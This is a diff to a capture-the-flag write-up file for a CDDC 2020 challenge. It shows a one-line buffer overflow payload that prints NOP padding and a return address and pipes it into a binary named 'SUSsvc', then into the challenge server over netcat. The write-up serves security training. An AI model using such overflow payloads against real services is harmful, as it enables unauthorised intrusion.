J041/CDDC-2020-writeup/solved/solved.md

-Reverse engineering and buffer exploitation python -c ‘print(“\x90”*256+”\x00\x3d\x34\x01”)’ | ./SUSsvc Now replace “./SUSsvc” with the netcat to the server.
-Flag will be returned (Server down by time writeup done)
+Reverse engineering and buffer exploitation python -c ‘print(“\x90”*256+”\x00\x3d\x34\x01”)’ | ./SUSsvc Replace “./SUSsvc” with the netcat to the server.
+Flag will be returned

 **Flag**